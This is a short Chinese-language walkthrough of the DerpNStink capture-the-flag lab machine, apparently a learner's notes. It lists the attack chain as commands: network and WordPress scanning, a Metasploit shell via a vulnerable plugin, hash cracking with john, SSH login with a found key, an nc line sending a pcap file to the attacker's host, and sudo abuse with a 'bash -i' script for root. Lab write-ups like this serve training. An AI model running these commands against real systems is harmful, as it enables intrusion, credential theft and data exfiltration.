DerpNStink----靶机渗透学习4

nmap -sP 192.168.8.0/24  //存活主机
nmap -sS -sV -T5 -A -p- 192.168.8.177 //端口探测
vim /etc/hosts //添加本地hosts 才能访问
dirb http://192.168.8.177 //目录扫描
wpscan -url 'http://derpnstink.localweblog/' //wordpress搭建的平台,用wpscan扫描,kali自带,发现有Slideshow Gallery插件漏洞可以利用
msf利用该漏洞,直接获得shell
翻看网站配置文件查找到数据库密码,登陆数据库
爆破第二个用户:
命令:echo ‘P PPBW6NTkFvboVVCHU2R9qmNai1WfHSC41’ >> hash.hash
命令:john hash.hash --wordlist=/usr/share/wordlists/rockyou.txt
命令:john hash.hash --show
使用开膛手进行爆破,这边如果没有rockyou.txt库的,可以去github下载
使用暴破出的用户名/密码:unclestinky/wedgie57进行登录


找到ssh的key密匙
chmod 400 key.txt //这里不太懂为什么是400,不是777
ssh -i key.txt stinky@192.168.8.177 //可以直接登陆stinky用户

发现有pcap文件
nc 192.168.182.149 4444 < derpissues.pcap
nc -l -p 4444 > derp.pcap //攻击机接收 用wireshark打开查找另外一个用户的密码

sudo -l //查看有sudo权限的文件或者命令 发现:
test ALL=(ALL)/home/mrderp/binaries/derpy* //意思是test用户可以在任何可能出现的主机名的主机中,可以切换到root下执行路径后的命令
所以可以用它来提权
etc/sudoers配置文件 参考:https://www.cnblogs.com/-colin/p/7801494.html


写入二进制代码:
#!/bin/bash
bash -i

chomd 777 derpy.sh
sudo ./derpy.sh //提权成功
原文地址:https://www.cnblogs.com/trevain/p/14419274.html